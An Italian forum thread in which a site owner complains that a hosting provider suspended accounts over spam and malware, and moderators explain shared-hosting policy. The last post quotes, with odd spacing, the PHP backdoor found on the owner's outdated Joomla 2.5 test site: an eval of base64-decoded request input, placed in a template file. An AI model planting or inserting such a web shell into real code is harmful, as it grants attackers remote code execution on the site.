Back to top

Autore Topic: RISOLTOPunto di vista sospendere domini e account appena hanno un malware o spam  (Letto 1780 volte)

Offline iLorenz

  • Appassionato
  • ***
  • Post: 441
  • Sesso: Maschio
    • Mostra profilo

Prima di tutto auguro un felice anno nuovo a tutta la community.  ;)

Ho da un paio di anni a questa parte spostato piano piano dei siti che gestivo su un hosting provider italiano che usa il cPanel e altri servizi con cui mi trovo bene. Penso che faccia parte dei migliori in Italia.


Ma negli ultimi tempi mi hanno sospeso l'account dell'area di un sito di un mio cliente perché una mail di quella azienda era sospetta di spam. Con la garanzia di cancellare quella mail e altri aggiornamenti mi hanno riattivato tutto. Ma se dovesse ricapitare mi sospenderebbe tutto l'account.


Vi sembra giusto?
Voglio dire, sono ip diversi. Domini diversi. Gestisco con questo account diversi clienti. Se un mio cliente ha fatto SPAM devi sospendere tutto il mio account dove gestisco altri 10 siti?


L'altro giorno invece senza avvisare nuovamente mi sospendono tutti servizi leggati ad un altro sito con la motivazione: Malware


E che cavolo! Sarò stato preso di mira?


Cosa ne pensate?
Non mi sono mai capitati problemi del genere. Ho poi sempre aggiornato le versioni dei siti e non ho mai riscontrato attacchi. Però non sò cosa pensare. Questa è la procedura da seguire?


Tra l'altro è davvero strano perché il sito con il Malware era aggiornato all'ultima versione della 2.5 e in modalità "sito in aggiornamento" con tanto di login e password. Era un area ancora di prova per fare test e altro. Nessuno poteva accederci. Come sia stato possibile rivelare un Malware è un mistero.


(scusate se ho postato questa domanda nell'area sbagliata)


« Ultima modifica: 29 Dic 2012, 14:46:29 da iLorenz »
"Nulla avviene per caso. Ciascuno è il riverbero dell'altro nel flusso dell'universo."
- James Redfielf -

Offline maicolstaip

  • Global Moderator
  • Instancabile
  • ********
  • Post: 17623
  • Sesso: Maschio
    • Mostra profilo
Ciao iLorenz,
dipende dal tuo contratto.

Anche a me anni fa è stato chiuso un account per "installazione canale IRC" su un subdominio che usavo con mambo per delle prove e di cui mi ero dimenticato persino l'esistenza.

E' bastato scrivere all'assistenza dell'host spiegando i miei motivi e mi hanno riattivato l'account.

In genere, specie se sei su hosting condiviso fanno prima a tagliarti tutto che a indagare sul perchè e percome.

Ciao!
Non si risponde a PM tecnici. Postate sul forum. Grazie.

mau_develop

  • Visitatore
dipende dal tuo contratto.

.. e come diceva Maicol dal fatto che puoi nuocere ad altri sullo stesso server che magari verrebbe messo in blacklist se non "bucato"... se il server è tuo non fa nulla nessuno

Offline iLorenz

  • Appassionato
  • ***
  • Post: 441
  • Sesso: Maschio
    • Mostra profilo
Eh già, visto così. Però i due siti erano su semidedicati, e uno con un ip proprio dedicato.
Ad ogni modo capisco.
Grazie per avermi condiviso il vs punto di vista.


Ad ogni modo per la cronaca, il sito con il malware era una versione di prova della 2.5 installata ad inizio primavera con virtuemart e non più aggiornata perché sviluppavo il sito in locale.
Il cracker bastardo l'ha buccato con:



< ? PHP
eval ( base 64_decode ( $_ REQUEST [' c_id ']));
? >


in /templates/ja_purity/showmessage.php
« Ultima modifica: 29 Dic 2012, 14:49:05 da iLorenz »
"Nulla avviene per caso. Ciascuno è il riverbero dell'altro nel flusso dell'universo."
- James Redfielf -

 



Web Design Bolzano Kreatif